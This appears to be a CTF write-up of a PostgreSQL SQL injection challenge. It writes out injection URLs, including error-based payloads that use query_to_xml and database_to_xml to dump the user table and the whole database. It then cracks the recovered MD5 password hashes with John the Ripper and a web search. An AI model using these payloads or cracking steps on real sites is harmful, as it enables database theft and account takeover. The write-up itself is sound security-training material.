TAMUctf 2021 API 2 : The SeQueL Solution
TAMUctf 2021 API 2 : The SeQueL - 150 points
I just made my own SCP collection website. What do you think?
This is a simple SQL injection (SQLi) challenge that taught me some new tricks for SQL injection exploitation. I should have known these already, but that is how these sort of things work.
The website appears to be referencing some sort of fiction with initialism SCP. Since it’s sometimes helpful, we search for SCP and find this: http://www.scpwiki.com/object-classes
Our first SQLi that gives us something interesting using a simple UNION
:
Improved SQLi with a valid containment:
Improved containment:
Canonical SQLi is wrong because they use a %.
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20or%20id=%271
pq: invalid input syntax for integer: “1%”
That explains or ‘1’=‘1 problem I was having intially because ‘1’ does not equal ‘1%’.
Now we can do a canonical SQLi:
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20or%20%271%25%27=%271
Success
The website:
Codename : Default
ID : 1
SCP Containment : safe
default testing icon
Codename : Teddy
ID : 2
SCP Containment : euclid
To please the teddy, one must offer them a sacrifice of your finest tea
Codename : Traffic Cone #88192
ID : 3
SCP Containment : neutralized
We believe they appear from interdimensional rifts with no clear origin
Codename : Gnomial
ID : 4
SCP Containment : thaumiel
If encountered in the wild do not make eye contact. They only become more aggressive.
Codename : Ą̷̡̺̼̗͉̦̦̝̰̲͍͍͖͚̌̓̅̈͐̀̌̀̾̾͘̚̚̚͘̕d̴̻͓̫̭͎͙̮̲͖̭̖̬̦͉͗͒̈́̉̐͋͗̈́̑̄̉̍͑͘ͅd̸̛̙̮͚̩̦̘̗͛͛̓̂̀́̽̒͂͊́̚i̷̡̫͖͎͖͕͎͋̃̀̅̽̾͋͑̿́́͝͝ṡ̵̲̤̥̲̣͚̥̠̍ơ̸̼̒͊̏̅̀̽̿̊̅̈́͊̃̑̓͂͘ṅ̶̢̡͙̣̝̹͓̯̤͉̌̎͜ͅ
ID : 5
SCP Containment : apollyon
H̵̢̩̺̞̥̮̱̤̗̱̹͓̱͔͕̱̔̂̄̇̑̿̚͝Ė̵͍͔̈̂̑̃́̎̿͊͝͝ͅ ̴̢̛̣̦̽̃̿͠I̵̱͚͕͇̱̮͛͑̋́͐̔̓̑͂͘͠ͅS̷̪̝̲̫̝͙͓͒̇͂̍͗̍͐͜ ̷̪̹͕͙͍̭͎̖̺̘̈́̒̍Ȁ̷͚͇̘͓͓Ḽ̴̢̝̗̥̜̭̹̪͉͎̀̿̽R̴̛̗̾̌̂̌̉͊́͋̏E̷̛͉͍̫͆͂͐̍̏͆͒͊̌̚̕͜͝Ā̶̧̛̛̭̬͎̩̭̬̪̩̦̦͚͙̹̳̅̆͌̑͋̎̄͆̒͜͜ͅD̷̨̼̙̣̲̱͎̘̺͎͕̩͉̳̪̲͉̒̐͌̅͌͂͑͠Y̶̬͚̜̰͕̦̝̝͗͌͂͛́͊̈́̐̽̔͒̔͛͐̕͠ ̷͓͔͓̭̞̏̔́̄̋̍̎̽̎͒̈́́̇̊̕͠͠H̶̦̮̿̍͌̀̂̂͌̚̕Ẽ̶̢̛̦͖̖̪̖̬̜̭̄̎̋̎̄̓͒͌̄͌̽́̈R̷̨̢̡̨̖̩͈͖̺̤̳̜̼̱̭̩̤̈́̄̊̌̐̐̕̕͝ͅE̸̡̡̩͓͓̣̲̜͚̖̊̈́͊͒̓͘͜
https://shell.tamuctf.com/problem/50034/?name=A
So I am able to get every one individually and in a list..
From a quick web search I found the version()
function which I should have known about. This tells us that we’re working with PostgreSQL.
PostgreSQL 11.11 (Debian 11.11-0+deb10u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit
All SQLi after here is now from this pretty cool SQLi write-up: https://pulsesecurity.co.nz/articles/postgres-sqli
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20union%20select%20%271%27,%20%272%27,%20%27safe%27,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20query_to_xml(%27select%20*%20from%20pg_user%27,true,true,%27%27))%20AS%20NUMERIC)=%271%27))%20THEN%20%27a%27%20ELSE%20%27b%27%20END),%275
pq: invalid input syntax for type numeric: " postgres 10 true true true true yeetus 16421 false false false false "
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20union%20select%20%271%27,%20%272%27,%20%27safe%27,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20database_to_xml(true,true,%27%27))%20AS%20NUMERIC)=%271%27))%20THEN%20%27a%27%20ELSE%20%27b%27%20END),%275
pq: invalid input syntax for type numeric: " 1 Default safe default testing icon avatar 2 Teddy euclid To please the teddy, one must offer them a sacrifice of your finest tea teddy 3 Traffic Cone #88192 neutralized We believe they appear from interdimensional rifts with no clear origin cone 4 Gnomial thaumiel If encountered in the wild do not make eye contact. They only become more aggressive. gnome 5 Ą̷̡̺̼̗͉̦̦̝̰̲͍͍͖͚̌̓̅̈͐̀̌̀̾̾͘̚̚̚͘̕d̴̻͓̫̭͎͙̮̲͖̭̖̬̦͉͗͒̈́̉̐͋͗̈́̑̄̉̍͑͘ͅd̸̛̙̮͚̩̦̘̗͛͛̓̂̀́̽̒͂͊́̚i̷̡̫͖͎͖͕͎͋̃̀̅̽̾͋͑̿́́͝͝ṡ̵̲̤̥̲̣͚̥̠̍ơ̸̼̒͊̏̅̀̽̿̊̅̈́͊̃̑̓͂͘ṅ̶̢̡͙̣̝̹͓̯̤͉̌̎͜ͅ apollyon H̵̢̩̺̞̥̮̱̤̗̱̹͓̱͔͕̱̔̂̄̇̑̿̚͝Ė̵͍͔̈̂̑̃́̎̿͊͝͝ͅ ̴̢̛̣̦̽̃̿͠I̵̱͚͕͇̱̮͛͑̋́͐̔̓̑͂͘͠ͅS̷̪̝̲̫̝͙͓͒̇͂̍͗̍͐͜ ̷̪̹͕͙͍̭͎̖̺̘̈́̒̍Ȁ̷͚͇̘͓͓Ḽ̴̢̝̗̥̜̭̹̪͉͎̀̿̽R̴̛̗̾̌̂̌̉͊́͋̏E̷̛͉͍̫͆͂͐̍̏͆͒͊̌̚̕͜͝Ā̶̧̛̛̭̬͎̩̭̬̪̩̦̦͚͙̹̳̅̆͌̑͋̎̄͆̒͜͜ͅD̷̨̼̙̣̲̱͎̘̺͎͕̩͉̳̪̲͉̒̐͌̅͌͂͑͠Y̶̬͚̜̰͕̦̝̝͗͌͂͛́͊̈́̐̽̔͒̔͛͐̕͠ ̷͓͔͓̭̞̏̔́̄̋̍̎̽̎͒̈́́̇̊̕͠͠H̶̦̮̿̍͌̀̂̂͌̚̕Ẽ̶̢̛̦͖̖̪̖̬̜̭̄̎̋̎̄̓͒͌̄͌̽́̈R̷̨̢̡̨̖̩͈͖̺̤̳̜̼̱̭̩̤̈́̄̊̌̐̐̕̕͝ͅE̸̡̡̩͓͓̣̲̜͚̖̊̈́͊͒̓͘͜ crump 1 glenn 9651cbc7c0b5fb1a81f2858a07813c82 Making More Challenges 2 teddy e2ec2b31abe380b989ff057aef66377a PWNing Away 3 admin gigem{SQL_1nj3ct1ons_c4n_b3_fun} Away on Vacation "
We got the solution:
gigem{SQL_1nj3ct1ons_c4n_b3_fun}
We found two extra passwords: glenn 9651cbc7c0b5fb1a81f2858a07813c82 teddy e2ec2b31abe380b989ff057aef66377a
Let’s crack them just in case..
john –format=raw-md5 –rules –wordlist=crack/ai3words_order.txt ~/altsci/tamuctf/sqlpw.txt
No luck. Let’s try google.
https://www.google.com/search?client=firefox-b-1-d&q=9651cbc7c0b5fb1a81f2858a07813c82
echo -n ‘star trek’ |md5sum 9651cbc7c0b5fb1a81f2858a07813c82 -
The first password for glenn is ‘star trek’, cool.
echo -n ‘teddy bear’ |md5sum e2ec2b31abe380b989ff057aef66377a -
The first password for teddy is ‘teddy bear’, cool.
Change your passwords folks. Don’t use simple passphrases.